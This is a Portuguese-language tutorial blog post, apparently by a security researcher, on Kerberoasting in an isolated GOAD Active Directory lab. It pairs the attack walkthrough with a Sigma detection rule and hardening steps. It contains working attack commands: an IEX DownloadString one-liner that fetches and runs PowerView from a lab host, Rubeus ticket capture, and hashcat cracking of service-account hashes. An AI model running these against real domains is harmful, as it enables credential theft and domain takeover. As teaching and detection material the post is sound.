Active Directory Pentest: Kerberoasting Passo a Passo em Lab GOAD

Kerberoasting continua matando dominios em 2026 porque equipes ainda criam Service Accounts com senhas fracas e SPNs registrados em DCs sem MFA reforcada. No nosso lab Game of Active Directory (GOAD v3), levamos cerca de 14 minutos do shell inicial em uma maquina do dominio sevenkingdoms.local ate quebrar a senha de um SQL Server service account com hashcat rodando em uma RTX 4070. Esse post documenta o passo a passo completo, da enumeracao com PowerView ate a regra Sigma que detecta o ataque no ELK do Blue Team. Tudo em ambiente isolado, com snapshot ativo e sem qualquer interacao com producao alheia.

Antes de tocar no GOAD, recomendo replicar o setup descrito em Pentest Web do Zero: Montando um Lab Seguro com DVWA, Juice Shop e Burp Suite para entender como segmentar a rede do lab, e revisar OPSEC para Pesquisadores de Seguranca: Modelo de Ameaca Pessoal para nao deixar artefatos vazarem da sua estacao. Nosso GOAD roda em tres VMs com 6 GB de RAM cada (DC01, DC02 e SRV02), mais um Kali com 8 GB exclusivo na vmnet9. Use o script Ansible oficial do Mayfly277, ele provisiona em uns 45 minutos numa maquina decente. Confirme que o firewall do Windows esta permissivo internamente, caso contrario voce vai debugar problema de RPC em vez de estudar Kerberos.

A enumeracao comeca depois do initial access. Suponha que voce ja conseguiu credenciais low-priv via tecnicas cobertas em Initial Access Simulado: Macros, LNK e ISO em Lab Windows 11 Isolado, no nosso caso a conta jaime.lannister:cersei. Carregamos o PowerView.ps1 com `IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/PowerView.ps1')` e disparamos `Get-DomainUser -SPN | select samaccountname, serviceprincipalname`. Tres contas aparecem: sqlsvc, httpsvc e backupsvc. O alvo natural e o sqlsvc, porque service accounts MSSQL frequentemente nasceram com senhas curtas em scripts de instalacao de 2018. Rubeus.exe e nossa ferramenta de captura: `Rubeus.exe kerberoast /nowrap /outfile:hashes.txt /user:sqlsvc`.

O TGS retornado vem cifrado com o hash NTLM da senha do service account, codificado como RC4-HMAC (etype 23) na maior parte dos labs e infelizmente em muita producao. Pegue o arquivo hashes.txt, transfira pro Kali via SMB ou curl, e jogue no hashcat com `hashcat -m 13100 hashes.txt rockyou.txt -r rules/best64.rule`. Em 2 minutos e 11 segundos a senha SQLSvc@2018 caiu. Se quiser brincar com listas maiores, OneRuleToRuleThemStill funciona bem, mas comece pelo basico. Para correlacionar com tecnicas relacionadas no Active Directory, veja Lateral Movement em Lab: SMB, WMI e WinRM com Foco em Deteccao e principalmente Persistencia em Windows: 10 Tecnicas Documentadas e suas Contramedidas depois desta etapa.

Do lado Blue Team, Kerberoasting nao e silencioso quando voce sabe onde olhar. O Event ID 4769 no DC registra cada Service Ticket emitido, e o campo Ticket Encryption Type igual a 0x17 (RC4) ja e amarelo em ambientes modernos com AES habilitado. A regra Sigma que escrevi olha para 4769 com TicketEncryption 0x17 OU 0x18, agrupa por usuario fonte em janela de 60 segundos, e dispara em >=5 SPNs distintos solicitados. Isso elimina ruido de aplicacoes legitimas. Para mais sobre instrumentacao, Threat Hunting com Sigma e Elastic: Do Indicador a Regra de Deteccao mostra como subir essa pipeline com Filebeat e Elastic, e Hunting de Living-off-the-Land Binaries no Windows com KQL cobre detecoes adjacentes para Defender for Identity.

A mitigacao pratica e em camadas. Primeiro, migre toda service account para Group Managed Service Accounts (gMSA) com rotacao automatica de 30 dias, eliminando a janela de crack offline util. Segundo, force AES256_HMAC_SHA1 desabilitando RC4 no msDS-SupportedEncryptionTypes da conta, valor 0x18. Terceiro, audite com `Get-ADUser -Filter {ServicePrincipalName -ne $null} -Properties PasswordLastSet, msDS-SupportedEncryptionTypes` mensalmente e marque qualquer conta com senha > 90 dias. Quarto, ative Protected Users Group para contas administrativas que tenham SPN. Para hardening complementar do dominio, Hardening de Windows 11 para Estacoes de Trabalho de Alto Risco cobre a estacao do administrador.

Takeaway pratico: monte hoje uma alerta no seu SIEM que dispare quando uma unica conta solicitar mais de 4 Service Tickets RC4 distintos em 5 minutos, e cruze com lista branca de service accounts esperadas. Custa duas horas de trabalho e teria pego 8 em cada 10 ataques reais de Kerberoasting que apareceram em relatorios de IR publicos em 2025. Documente o playbook, treine o time com o GOAD reproduzido localmente, e revisite a postura a cada novo SPN criado no dominio. Sem isso, sua proxima dor de cabeca pode vir exatamente desse vetor.